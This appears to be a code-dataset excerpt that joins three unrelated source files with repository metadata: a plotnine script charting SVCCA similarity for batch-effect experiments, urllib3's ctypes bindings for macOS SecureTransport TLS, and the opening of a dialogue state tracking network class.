"analysis_0_svcca_overlay_blk.png")
svcca_overlay_long_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay_long.png")
svcca_overlay_long_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay_long_blk.png")
# In[4]:
# Load pickled files
uncorrected_svcca = pd.read_pickle(similarity_uncorrected_file)
err_uncorrected_svcca = pd.read_pickle(ci_uncorrected_file)
corrected_svcca = pd.read_pickle(similarity_corrected_file)
err_corrected_svcca = pd.read_pickle(ci_corrected_file)
permuted_score = np.load(permuted_score_file)
# In[5]:
# Concatenate error bars
uncorrected_svcca_err = pd.concat([uncorrected_svcca, err_uncorrected_svcca], axis=1)
corrected_svcca_err = pd.concat([corrected_svcca, err_corrected_svcca], axis=1)
# In[6]:
# Add group label
uncorrected_svcca_err['Group'] = 'uncorrected'
corrected_svcca_err['Group'] = 'corrected'
# In[7]:
# Concatenate dataframes
all_svcca = pd.concat([uncorrected_svcca_err, corrected_svcca_err])
all_svcca
# In[8]:
# Plot - uncorrected only
lst_num_experiments = list(all_svcca.index[0:int(len(all_svcca.index)/2)])
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca[all_svcca['Group'] == 'uncorrected']) + geom_line(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white')
) \
+ scale_color_manual(['#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_uncorrected_file, dpi=300)
# In[9]:
# Plot - uncorrected only black
lst_num_experiments = list(all_svcca.index[0:int(len(all_svcca.index)/2)])
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca[all_svcca['Group'] == 'uncorrected']) + geom_line(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
strip_background=element_blank()
) \
+ scale_color_manual(['#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_uncorrected_blk_file, dpi=300)
# In[10]:
# Plot
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white')
) \
+ scale_color_manual(['#1976d2', '#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_overlay_file, dpi=300)
# In[11]:
# Plot - black
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="lightgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
strip_background=element_blank()
) \
+ scale_color_manual(['#1976d2', '#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_overlay_blk_file, dpi=300)
# In[12]:
# Plot - elongated
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white'),
aspect_ratio=0.4
) \
+ scale_color_manual(['#1976d2', '#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_overlay_long_file, dpi=300)
# In[13]:
# Plot - black
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
    np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="lightgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
aspect_ratio=0.4,
strip_background=element_blank()
) \
+ scale_color_manual(['#1976d2', '#b3e5fc'])
print(g)
ggsave(plot=g, filename=svcca_overlay_long_blk_file, dpi=300)
| 30.680171
| 122
| 0.610049
|
4a1449e84f297f7d17f7ccd8d3e8c369970b7cac
| 17,651
|
py
|
Python
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | 23
|
2017-01-20T01:18:31.000Z
|
2017-01-20T17:25:11.000Z
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | 1
|
2022-03-17T13:12:17.000Z
|
2022-03-17T13:12:17.000Z
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | null | null | null |
"""
This module uses ctypes to bind a whole bunch of functions and constants from
SecureTransport. The goal here is to provide the low-level API to
SecureTransport. These are essentially the C-level functions and constants, and
they're pretty gross to work with.
This code is a bastardised version of the code found in Will Bond's oscrypto
library. An enormous debt is owed to him for blazing this trail for us. For
that reason, this code should be considered to be covered both by urllib3's
license and by oscrypto's:
Copyright (c) 2015-2016 Will Bond <will@wbond.net>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
import platform
from ctypes import (
CDLL,
CFUNCTYPE,
POINTER,
c_bool,
c_byte,
c_char_p,
c_int32,
c_long,
c_size_t,
c_uint32,
c_ulong,
c_void_p,
)
from ctypes.util import find_library
from pipenv.vendor.urllib3.packages.six import raise_from
if platform.system() != "Darwin":
raise ImportError("Only macOS is supported")
version = platform.mac_ver()[0]
version_info = tuple(map(int, version.split(".")))
if version_info < (10, 8):
raise OSError(
"Only OS X 10.8 and newer are supported, not %s.%s"
% (version_info[0], version_info[1])
)
def load_cdll(name, macos10_16_path):
"""Loads a CDLL by name, falling back to known path on 10.16+"""
try:
# Big Sur is technically 11 but we use 10.16 due to the Big Sur
# beta being labeled as 10.16.
if version_info >= (10, 16):
path = macos10_16_path
else:
path = find_library(name)
if not path:
raise OSError # Caught and reraised as 'ImportError'
return CDLL(path, use_errno=True)
except OSError:
raise_from(ImportError("The library %s failed to load" % name), None)
Security = load_cdll(
"Security", "/System/Library/Frameworks/Security.framework/Security"
)
CoreFoundation = load_cdll(
"CoreFoundation",
"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation",
)
Boolean = c_bool
CFIndex = c_long
CFStringEncoding = c_uint32
CFData = c_void_p
CFString = c_void_p
CFArray = c_void_p
CFMutableArray = c_void_p
CFDictionary = c_void_p
CFError = c_void_p
CFType = c_void_p
CFTypeID = c_ulong
CFTypeRef = POINTER(CFType)
CFAllocatorRef = c_void_p
OSStatus = c_int32
CFDataRef = POINTER(CFData)
CFStringRef = POINTER(CFString)
CFArrayRef = POINTER(CFArray)
CFMutableArrayRef = POINTER(CFMutableArray)
CFDictionaryRef = POINTER(CFDictionary)
CFArrayCallBacks = c_void_p
CFDictionaryKeyCallBacks = c_void_p
CFDictionaryValueCallBacks = c_void_p
SecCertificateRef = POINTER(c_void_p)
SecExternalFormat = c_uint32
SecExternalItemType = c_uint32
SecIdentityRef = POINTER(c_void_p)
SecItemImportExportFlags = c_uint32
SecItemImportExportKeyParameters = c_void_p
SecKeychainRef = POINTER(c_void_p)
SSLProtocol = c_uint32
SSLCipherSuite = c_uint32
SSLContextRef = POINTER(c_void_p)
SecTrustRef = POINTER(c_void_p)
SSLConnectionRef = c_uint32
SecTrustResultType = c_uint32
SecTrustOptionFlags = c_uint32
SSLProtocolSide = c_uint32
SSLConnectionType = c_uint32
SSLSessionOption = c_uint32
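# Annotate every bound function with ctypes argtypes/restype so calls are
# type-checked and return values converted correctly; any missing symbol
# surfaces as an AttributeError handled at the end of this block.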
try:
Security.SecItemImport.argtypes = [
CFDataRef,
CFStringRef,
POINTER(SecExternalFormat),
POINTER(SecExternalItemType),
SecItemImportExportFlags,
POINTER(SecItemImportExportKeyParameters),
SecKeychainRef,
POINTER(CFArrayRef),
]
Security.SecItemImport.restype = OSStatus
Security.SecCertificateGetTypeID.argtypes = []
Security.SecCertificateGetTypeID.restype = CFTypeID
Security.SecIdentityGetTypeID.argtypes = []
Security.SecIdentityGetTypeID.restype = CFTypeID
Security.SecKeyGetTypeID.argtypes = []
Security.SecKeyGetTypeID.restype = CFTypeID
Security.SecCertificateCreateWithData.argtypes = [CFAllocatorRef, CFDataRef]
Security.SecCertificateCreateWithData.restype = SecCertificateRef
Security.SecCertificateCopyData.argtypes = [SecCertificateRef]
Security.SecCertificateCopyData.restype = CFDataRef
Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p]
Security.SecCopyErrorMessageString.restype = CFStringRef
Security.SecIdentityCreateWithCertificate.argtypes = [
CFTypeRef,
SecCertificateRef,
POINTER(SecIdentityRef),
]
Security.SecIdentityCreateWithCertificate.restype = OSStatus
Security.SecKeychainCreate.argtypes = [
c_char_p,
c_uint32,
c_void_p,
Boolean,
c_void_p,
POINTER(SecKeychainRef),
]
Security.SecKeychainCreate.restype = OSStatus
Security.SecKeychainDelete.argtypes = [SecKeychainRef]
Security.SecKeychainDelete.restype = OSStatus
Security.SecPKCS12Import.argtypes = [
CFDataRef,
CFDictionaryRef,
POINTER(CFArrayRef),
]
Security.SecPKCS12Import.restype = OSStatus
SSLReadFunc = CFUNCTYPE(OSStatus, SSLConnectionRef, c_void_p, POINTER(c_size_t))
SSLWriteFunc = CFUNCTYPE(
OSStatus, SSLConnectionRef, POINTER(c_byte), POINTER(c_size_t)
)
Security.SSLSetIOFuncs.argtypes = [SSLContextRef, SSLReadFunc, SSLWriteFunc]
Security.SSLSetIOFuncs.restype = OSStatus
Security.SSLSetPeerID.argtypes = [SSLContextRef, c_char_p, c_size_t]
Security.SSLSetPeerID.restype = OSStatus
Security.SSLSetCertificate.argtypes = [SSLContextRef, CFArrayRef]
Security.SSLSetCertificate.restype = OSStatus
Security.SSLSetCertificateAuthorities.argtypes = [SSLContextRef, CFTypeRef, Boolean]
Security.SSLSetCertificateAuthorities.restype = OSStatus
Security.SSLSetConnection.argtypes = [SSLContextRef, SSLConnectionRef]
Security.SSLSetConnection.restype = OSStatus
Security.SSLSetPeerDomainName.argtypes = [SSLContextRef, c_char_p, c_size_t]
Security.SSLSetPeerDomainName.restype = OSStatus
Security.SSLHandshake.argtypes = [SSLContextRef]
Security.SSLHandshake.restype = OSStatus
Security.SSLRead.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)]
Security.SSLRead.restype = OSStatus
Security.SSLWrite.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)]
Security.SSLWrite.restype = OSStatus
Security.SSLClose.argtypes = [SSLContextRef]
Security.SSLClose.restype = OSStatus
Security.SSLGetNumberSupportedCiphers.argtypes = [SSLContextRef, POINTER(c_size_t)]
Security.SSLGetNumberSupportedCiphers.restype = OSStatus
Security.SSLGetSupportedCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
POINTER(c_size_t),
]
Security.SSLGetSupportedCiphers.restype = OSStatus
Security.SSLSetEnabledCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
c_size_t,
]
Security.SSLSetEnabledCiphers.restype = OSStatus
    Security.SSLGetNumberEnabledCiphers.argtypes = [SSLContextRef, POINTER(c_size_t)]
Security.SSLGetNumberEnabledCiphers.restype = OSStatus
Security.SSLGetEnabledCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
POINTER(c_size_t),
]
Security.SSLGetEnabledCiphers.restype = OSStatus
Security.SSLGetNegotiatedCipher.argtypes = [SSLContextRef, POINTER(SSLCipherSuite)]
Security.SSLGetNegotiatedCipher.restype = OSStatus
Security.SSLGetNegotiatedProtocolVersion.argtypes = [
SSLContextRef,
POINTER(SSLProtocol),
]
Security.SSLGetNegotiatedProtocolVersion.restype = OSStatus
Security.SSLCopyPeerTrust.argtypes = [SSLContextRef, POINTER(SecTrustRef)]
Security.SSLCopyPeerTrust.restype = OSStatus
Security.SecTrustSetAnchorCertificates.argtypes = [SecTrustRef, CFArrayRef]
Security.SecTrustSetAnchorCertificates.restype = OSStatus
    Security.SecTrustSetAnchorCertificatesOnly.argtypes = [SecTrustRef, Boolean]
Security.SecTrustSetAnchorCertificatesOnly.restype = OSStatus
Security.SecTrustEvaluate.argtypes = [SecTrustRef, POINTER(SecTrustResultType)]
Security.SecTrustEvaluate.restype = OSStatus
Security.SecTrustGetCertificateCount.argtypes = [SecTrustRef]
Security.SecTrustGetCertificateCount.restype = CFIndex
Security.SecTrustGetCertificateAtIndex.argtypes = [SecTrustRef, CFIndex]
Security.SecTrustGetCertificateAtIndex.restype = SecCertificateRef
Security.SSLCreateContext.argtypes = [
CFAllocatorRef,
SSLProtocolSide,
SSLConnectionType,
]
Security.SSLCreateContext.restype = SSLContextRef
Security.SSLSetSessionOption.argtypes = [SSLContextRef, SSLSessionOption, Boolean]
Security.SSLSetSessionOption.restype = OSStatus
Security.SSLSetProtocolVersionMin.argtypes = [SSLContextRef, SSLProtocol]
Security.SSLSetProtocolVersionMin.restype = OSStatus
Security.SSLSetProtocolVersionMax.argtypes = [SSLContextRef, SSLProtocol]
Security.SSLSetProtocolVersionMax.restype = OSStatus
try:
Security.SSLSetALPNProtocols.argtypes = [SSLContextRef, CFArrayRef]
Security.SSLSetALPNProtocols.restype = OSStatus
except AttributeError:
# Supported only in 10.12+
pass
Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p]
Security.SecCopyErrorMessageString.restype = CFStringRef
Security.SSLReadFunc = SSLReadFunc
Security.SSLWriteFunc = SSLWriteFunc
Security.SSLContextRef = SSLContextRef
Security.SSLProtocol = SSLProtocol
Security.SSLCipherSuite = SSLCipherSuite
Security.SecIdentityRef = SecIdentityRef
Security.SecKeychainRef = SecKeychainRef
Security.SecTrustRef = SecTrustRef
Security.SecTrustResultType = SecTrustResultType
Security.SecExternalFormat = SecExternalFormat
Security.OSStatus = OSStatus
Security.kSecImportExportPassphrase = CFStringRef.in_dll(
Security, "kSecImportExportPassphrase"
)
Security.kSecImportItemIdentity = CFStringRef.in_dll(
Security, "kSecImportItemIdentity"
)
# CoreFoundation time!
CoreFoundation.CFRetain.argtypes = [CFTypeRef]
CoreFoundation.CFRetain.restype = CFTypeRef
CoreFoundation.CFRelease.argtypes = [CFTypeRef]
CoreFoundation.CFRelease.restype = None
CoreFoundation.CFGetTypeID.argtypes = [CFTypeRef]
CoreFoundation.CFGetTypeID.restype = CFTypeID
CoreFoundation.CFStringCreateWithCString.argtypes = [
CFAllocatorRef,
c_char_p,
CFStringEncoding,
]
CoreFoundation.CFStringCreateWithCString.restype = CFStringRef
CoreFoundation.CFStringGetCStringPtr.argtypes = [CFStringRef, CFStringEncoding]
CoreFoundation.CFStringGetCStringPtr.restype = c_char_p
CoreFoundation.CFStringGetCString.argtypes = [
CFStringRef,
c_char_p,
CFIndex,
CFStringEncoding,
]
CoreFoundation.CFStringGetCString.restype = c_bool
CoreFoundation.CFDataCreate.argtypes = [CFAllocatorRef, c_char_p, CFIndex]
CoreFoundation.CFDataCreate.restype = CFDataRef
CoreFoundation.CFDataGetLength.argtypes = [CFDataRef]
CoreFoundation.CFDataGetLength.restype = CFIndex
CoreFoundation.CFDataGetBytePtr.argtypes = [CFDataRef]
CoreFoundation.CFDataGetBytePtr.restype = c_void_p
CoreFoundation.CFDictionaryCreate.argtypes = [
CFAllocatorRef,
POINTER(CFTypeRef),
POINTER(CFTypeRef),
CFIndex,
CFDictionaryKeyCallBacks,
CFDictionaryValueCallBacks,
]
CoreFoundation.CFDictionaryCreate.restype = CFDictionaryRef
CoreFoundation.CFDictionaryGetValue.argtypes = [CFDictionaryRef, CFTypeRef]
CoreFoundation.CFDictionaryGetValue.restype = CFTypeRef
CoreFoundation.CFArrayCreate.argtypes = [
CFAllocatorRef,
POINTER(CFTypeRef),
CFIndex,
CFArrayCallBacks,
]
CoreFoundation.CFArrayCreate.restype = CFArrayRef
CoreFoundation.CFArrayCreateMutable.argtypes = [
CFAllocatorRef,
CFIndex,
CFArrayCallBacks,
]
CoreFoundation.CFArrayCreateMutable.restype = CFMutableArrayRef
CoreFoundation.CFArrayAppendValue.argtypes = [CFMutableArrayRef, c_void_p]
CoreFoundation.CFArrayAppendValue.restype = None
CoreFoundation.CFArrayGetCount.argtypes = [CFArrayRef]
CoreFoundation.CFArrayGetCount.restype = CFIndex
CoreFoundation.CFArrayGetValueAtIndex.argtypes = [CFArrayRef, CFIndex]
CoreFoundation.CFArrayGetValueAtIndex.restype = c_void_p
CoreFoundation.kCFAllocatorDefault = CFAllocatorRef.in_dll(
CoreFoundation, "kCFAllocatorDefault"
)
CoreFoundation.kCFTypeArrayCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeArrayCallBacks"
)
CoreFoundation.kCFTypeDictionaryKeyCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeDictionaryKeyCallBacks"
)
CoreFoundation.kCFTypeDictionaryValueCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeDictionaryValueCallBacks"
)
CoreFoundation.CFTypeRef = CFTypeRef
CoreFoundation.CFArrayRef = CFArrayRef
CoreFoundation.CFStringRef = CFStringRef
CoreFoundation.CFDictionaryRef = CFDictionaryRef
except AttributeError:
raise ImportError("Error initializing ctypes")
class CFConst(object):
"""
A class object that acts as essentially a namespace for CoreFoundation
constants.
"""
kCFStringEncodingUTF8 = CFStringEncoding(0x08000100)
class SecurityConst(object):
"""
A class object that acts as essentially a namespace for Security constants.
"""
kSSLSessionOptionBreakOnServerAuth = 0
kSSLProtocol2 = 1
kSSLProtocol3 = 2
kTLSProtocol1 = 4
kTLSProtocol11 = 7
kTLSProtocol12 = 8
# SecureTransport does not support TLS 1.3 even if there's a constant for it
kTLSProtocol13 = 10
kTLSProtocolMaxSupported = 999
kSSLClientSide = 1
kSSLStreamType = 0
kSecFormatPEMSequence = 10
kSecTrustResultInvalid = 0
kSecTrustResultProceed = 1
# This gap is present on purpose: this was kSecTrustResultConfirm, which
# is deprecated.
kSecTrustResultDeny = 3
kSecTrustResultUnspecified = 4
kSecTrustResultRecoverableTrustFailure = 5
kSecTrustResultFatalTrustFailure = 6
kSecTrustResultOtherError = 7
errSSLProtocol = -9800
errSSLWouldBlock = -9803
errSSLClosedGraceful = -9805
errSSLClosedNoNotify = -9816
errSSLClosedAbort = -9806
errSSLXCertChainInvalid = -9807
errSSLCrypto = -9809
errSSLInternal = -9810
errSSLCertExpired = -9814
errSSLCertNotYetValid = -9815
errSSLUnknownRootCert = -9812
errSSLNoRootCert = -9813
errSSLHostNameMismatch = -9843
errSSLPeerHandshakeFail = -9824
errSSLPeerUserCancelled = -9839
errSSLWeakPeerEphemeralDHKey = -9850
errSSLServerAuthCompleted = -9841
errSSLRecordOverflow = -9847
errSecVerifyFailed = -67808
errSecNoTrustSettings = -25263
errSecItemNotFound = -25300
errSecInvalidTrustSettings = -25262
# Cipher suites. We only pick the ones our default cipher string allows.
# Source: https://developer.apple.com/documentation/security/1550981-ssl_cipher_suite_values
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009F
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009E
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xC024
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xC028
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xC00A
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xC014
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006B
TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xC023
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xC027
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xC009
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xC013
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009D
TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009C
TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003D
TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003C
TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F
TLS_AES_128_GCM_SHA256 = 0x1301
TLS_AES_256_GCM_SHA384 = 0x1302
TLS_AES_128_CCM_8_SHA256 = 0x1305
TLS_AES_128_CCM_SHA256 = 0x1304
| 33.944231
| 96
| 0.755651
|
4a144bd3cfd00ed8062e5798c7cb7d05cc7c7891
| 5,349
|
py
|
Python
|
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | 6
|
2020-11-15T13:35:12.000Z
|
2022-01-30T10:03:40.000Z
|
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | null | null | null |
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | 1
|
2020-11-16T13:26:31.000Z
|
2020-11-16T13:26:31.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.weight_norm import weight_norm
import math, copy, time
from torch.autograd import Variable
from collections import OrderedDict
import pdb
from models.modules import *
class DSTNet(nn.Module):
def __init__(self, in_embed,
layer_norm,
slot_dst,
domain_dst,
domain_slot_dst,
dst_generator,
args):
super(DSTNet, self).__init__()
        self.in_embed = in_embed
        self.layer_norm = layer_norm
        self.slot_dst = slot_dst
        self.domain_dst = domain_dst
        self.domain_slot_dst = domain_slot_dst
        self.dst_generator = dst_generator
        self.args = args
def load_pretrained(self, pretrained_dst):
self.in_embed[0].load_pretrained(pretrained_dst.in_embed[0])
count = 0
for layer in self.layer_norm:
layer.load_pretrained(pretrained_dst.layer_norm[count])
count += 1
self.slot_dst.load_pretrained(pretrained_dst.slot_dst)
if self.domain_dst is not None: self.domain_dst.load_pretrained(pretrained_dst.domain_dst)
if self.domain_slot_dst is not None: self.domain_slot_dst.load_pretrained(pretrained_dst.domain_slot_dst)
self.dst_generator.load_pretrained(pretrained_dst.dst_generator)
def forward(self, batch, out):
out = self.encode(batch, out)
out = self.track_state(batch, out)
return out
def encode(self, batch, out):
count = 0
if self.args.domain_flow:
out['embedded_slots'] = self.layer_norm[count](self.in_embed[0](batch.in_slots))
count += 1
out['embedded_domains'] = self.layer_norm[count](self.in_embed[0](batch.in_domains))
count += 1
else:
out['embedded_slots'] = self.layer_norm[count](self.in_embed[0](batch.in_slots).sum(2))
count += 1
if self.args.add_prev_dial_state:
out['embedded_state'] = self.layer_norm[count](self.in_embed(batch.in_state))
count += 1
